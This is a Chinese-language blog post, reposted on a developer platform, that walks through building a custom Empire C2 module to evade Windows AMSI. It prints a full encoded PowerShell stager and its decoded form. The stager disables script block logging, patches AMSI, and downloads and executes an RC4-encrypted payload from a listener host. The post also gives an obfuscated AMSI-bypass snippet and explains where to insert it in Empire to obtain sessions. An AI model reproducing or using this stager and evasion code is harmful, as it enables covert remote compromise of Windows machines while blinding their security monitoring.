前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >构建自定义的Empire模块来绕过amsi

构建自定义的Empire模块来绕过amsi

作者头像
鸿鹄实验室
发布2021-04-29 17:12:04
7490
发布2021-04-29 17:12:04
举报
文章被收录于专栏:鸿鹄实验室

今天逛推特,看到了某师傅通过自定义Empire模块来绕过amsi,地址如下:https://twitter.com/_vinnybod/status/1386442836417994752

但可惜的是,作者没有给出任何的细节,于是本人便自行尝试了一把,并记录下来操作过程。但是Empire的最新版本是3.8.2,所以我们的测试环境也就是github的最新版本,下载地址如下:

https://github.com/BC-SECURITY/Empire/releases/tag/v3.8.2

安装过程这边就先略过了,本身Empire也提供了安装脚本,傻瓜式安装即可。我们以基本的http监听其为例

可以看到其给出的相关选项,包括新加入的抖动值和profile选项。执行并生成powershell载荷

代码语言:javascript
复制
powershell -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVgBFAFIAcwBpAE8ATgBU
AGEAQgBsAGUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AYQBqAE8AUgAgAC0ARwBlACAA
MwApAHsAJABCAEUAMgBlADMAPQBbAFIAZQBmAF0ALgBBAFMAcwBFAG0AQgBMAHkALgBH
AGUAVABUAFkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQA
LgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBlAFQARgBp
AGUAYABsAGQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFM
AZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdAB
hAHQAaQBjACcAKQA7AEkARgAoACQAYgBFADIARQAzACkAewAkADgAZgBBADEAQgA9ACQ
AQgBFADIAZQAzAC4ARwBFAFQAVgBBAEwAVQBFACgAJABuAFUAbABMACkAOwBJAGYAKA
AkADgAZgBBADEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnA
GcAaQBuAGcAJwBdACkAewAkADgARgBBADEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsA
JwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcg
BpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA
4AGYAYQAxAGIAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBn
AGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJABWAGEAbAA9AFsAQwBvAEwAbABFAGMAdABpAE8ATgBzAC4ARwBlAE4ARQByAGkAYwAuAEQASQBjAHQASQBvAG4AQQBSAFkAWwBzAFQAUgBJAE4AZwAsAFMAeQBTAHQARQBtAC4ATwBiAEoAZQBjAHQAXQBdADoAOgBuAGUAVwAoACkAOwAkAFYAQQBMAC4AQQBEAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAFYAQQBMAC4AQQBkAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOABmAGEAMQBCAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAYQBMAH0ARQBsAFMAZQB7AFsAUwBjAFIAaQBwAHQAQgBMAE8AYwBrAF0ALgAiAEcAZQBUAEYAaQBFAGAATABkACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdABWAEEAbABVAGUAKAAkAE4AVQBsAEwALAAoAE4ARQB3AC0ATwBCAEoAZQBDAFQAIABDAG8AbABsAEUAYwB0AGkAbwBuAHMALgBHAEUATgBlAFIAaQBjAC4ASABhAHMASABTAEUAVABbAFMAVABSAGkATgBnAF0AKQApAH0AJABSAGUARgA9AFsAUgBlAEYAXQAuAEEAUwBTAGUATQBCAGwAWQAuAEcARQBUAFQAWQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIAZQBGAC4ARwBlAHQARgBpAGUATABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAdABWAEEATABVAEUAKAAkAG4AVQBsAEwALAAkAFQAcgBVAGUAKQA7AH0AOwBbAFMAeQBTAFQAZQBtAC4ATgBFAFQALgBTAGUAUgBWAGkAYwBFAFAATwBpAG4AVABNAEEATgBhAEcARQBSAF0AOgA6AEUAeABQAGUAQwB0ADEAMAAwAEMAbwBuAFQASQBuAFUAZQA9ADAAOwAkAEUANgBDAEMANQA9AE4AZQBXAC0ATwBCAEoAZQBjAHQAIABTAHkAUwBUAEUATQAuAE4ARQBUAC4AVwBlAEIAQwBMAEkAZQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAE4AYwBvAEQASQBuAGcAXQA6ADoAVQBuAGkAQwBPAGQAZQAuAEcARQBUAFMAVABSAEkAbgBHACgAWwBDAE8AbgB2AGUAcgBUAF0AOgA6AEYAUgBvAG0AQgBhAHMAZQA2ADQAUwB0AFIASQBuAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBnAEEAdQBBAEQARQBBAE0AUQBBADAAQQBEAG8AQQBOAEEAQQAwAEEARABRAEEATgBBAEEAPQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJABFADYAQwBjADUALgBIAEUAYQBkAGUAUgBTAC4AQQBkAEQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABFADYAYwBjADUALgBQAHIATwB4AFkAPQBbAFMAeQBTAFQARQBNAC4ATgBlAFQALgBXAEUAYgBSAGUAcQBVAGUAUwBUAF0AOgA6AEQAZQBGAEEAdQBMAHQAVwBFAGIAUABSAG8AeAB5ADsAJABFADYAQwBjADUALgBQAHIATwBYAHkALgBDAFIAZQBEAEUAbgB0AEkAQQBMAHMAIAA9ACAAWwBTAFkAUwBUAGUATQAuAE4AZQBUAC4AQwBSAEUAZABlAG4AdABpAGEATABDAEEAQwBIAEUAXQA6ADoARABlAGYAQQBVAEwAdABOAEUAVABXAG8AUgBrAEMAUgBFAGQAZQBOAHQASQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJABlADYAYwBjADUALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAWQBTAFQARQBNAC4AVABFAFgAdAAuAEUATgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAFkAdABFAHMAKAAnADIAPwBVADQAUABaAF4AQwBLAHAAKABbAC0APgBRACoAKwBkAC8AQgBTAGMALABUAEcAMwBOAHcASABFAHkAawAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQBSAGcAUwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBCAFgAbwBSACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAkAGUANgBjAGMANQAuAEgARQBBAEQAZQByAHMALgBBAGQARAAoACIAQwBvAG8AawBpAGUAIgAsACIAdgBGAHMAUgBUAHgAYwBIAG0AcwA9AEQARgB2AFEASABHAHEAYwBHAGcARQBYAEUAdgBHADQAYwBHAEUANABWAHAAUgBaAGsATwA0AD0AIgApADsAJABEAEEAVABBAD0AJABFADYAYwBDADUALgBEAG8AdwBuAEwATwBBAEQARABBAHQAQQAoACQAcwBFAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABkAEEAdABBAFsAMAAuAC4AMwBdADsAJABEAEEAdABhAD0AJABEAGEAVABBAFsANAAuAC4AJABEAEEAVABBAC4AbABlAG4ARwB0AEgAXQA7AC0ASgBPAEkAbgBbAEMASABhAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=

base64解码后如下:

代码语言:javascript
复制
('cachedGroupPolicySettings','N'+'onPublic,Static');IF($bE2E3){$8fA1
B=$BE2e3.GETVALUE($nUlL);If($8fA1b['ScriptB'+'lockLogging']){$8FA1b[
'ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$8fa1b['Sc
riptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$Val=[
CoLlEctiONs.GeNEric.DIctIonARY[sTRINg,SyStEm.ObJect]]::neW();$VAL.AD
d('EnableScriptB'+'lockLogging',0);$VAL.Add('EnableScriptBlockInvoca
tionLogging',0);$8fa1B['HKEY_LOCAL_MACHINE\Software\Policies\Micros
oft\Windows\PowerShell\ScriptB'+'lockLogging']=$VaL}ElSe{[ScRiptBLOc
k]."GeTFiE`Ld"('signatures','N'+'onPublic,Static').SetVAlUe($NUlL,(N
Ew-OBJeCT CollEctions.GENeRic.HasHSET[STRiNg]))}$ReF=[ReF].ASSeMBlY.GETTYpE('System.Management.Automation.Amsi'+'Utils');$ReF.GetFieLd('amsiInitF'+'ailed','NonPublic,Static').SEtVALUE($nUlL,$TrUe);};[SySTem.NET.SeRVicEPOinTMANaGER]::ExPeCt100ConTInUe=0;$E6CC5=NeW-OBJect SySTEM.NET.WeBCLIeNT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([TExT.ENcoDIng]::UniCOde.GETSTRInG([COnverT]::FRomBase64StRIng('aAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgAuADEAMQA0ADoANAA0ADQANAA=')));$t='/news.php';$E6Cc5.HEadeRS.AdD('User-Agent',$u);$E6cc5.PrOxY=[SySTEM.NeT.WEbReqUeST]::DeFAuLtWEbPRoxy;$E6Cc5.PrOXy.CReDEntIALs = [SYSTeM.NeT.CREdentiaLCACHE]::DefAULtNETWoRkCREdeNtIals;$Script:Proxy = $e6cc5.Proxy;$K=[SYSTEM.TEXt.ENcoding]::ASCII.GetBYtEs('2?U4PZ^CKp([->Q*+d/BSc,TG3NwHEyk');$R={$D,$K=$ARgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CounT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXoR$S[($S[$I]+$S[$H])%256]}};$e6cc5.HEADers.AdD("Cookie","vFsRTxcHms=DFvQHGqcGgEXEvG4cGE4VpRZkO4=");$DATA=$E6cC5.DownLOADDAtA($sER+$T);$iV=$dAtA[0..3];$DAta=$DaTA[4..$DATA.lenGtH];-JOIn[CHar[]](& $R $daTa ($IV+$K))|IEX

我们没必要去关心这些代码具体去做了什么,我们只需要知道,这个代码是会被拦截的就够了。

最简单来说我们可以使用Amsi.fail来生成我们的载荷

比如下面这样

代码语言:javascript
复制
[Ref].AsSEMbly.GeTtype('System.Management.Automation.'+
$([SYsTeM.NET.weButIlity]::HTmLDEcodE('Amsi'))+
'Utils').GetField(''+$([CHAr]([BYTe]0x61)+[chAR](81+28)+
[char](211-96)+[cHaR](149-44))+'InitFailed',$([CHaR]
([byTe]0x4E)+[ChAr](198-87)+[CHaR](1980/18)+[CHAR](77+3)+
[ChAr]([Byte]0x75)+[CHar](5684/58)+[cHAR]([BYte]0x6C)+[ChAR]
([BYtE]0x69)+[ChaR]([BYTE]0x63)+[chAR]([bYtE]0x2C)+[ChAR]
([Byte]0x53)+[cHAR](116)+[ChAR](97)+[chaR]([BytE]0x74)+
[Char](68+37)+[cHAr](78+21))).Set

这样再执行,就不会被拦截了:

而所有的empire是可以通过set来进行设置的

文件位置如下:

代码语言:javascript
复制
/lib/common/bypasses.py

然后把刚刚生成的,加入进去即可,为了流量等问题,我们再更改监听器的部分设置

然后生成,执行,获得会话:

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-04-28,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 鸿鹄实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档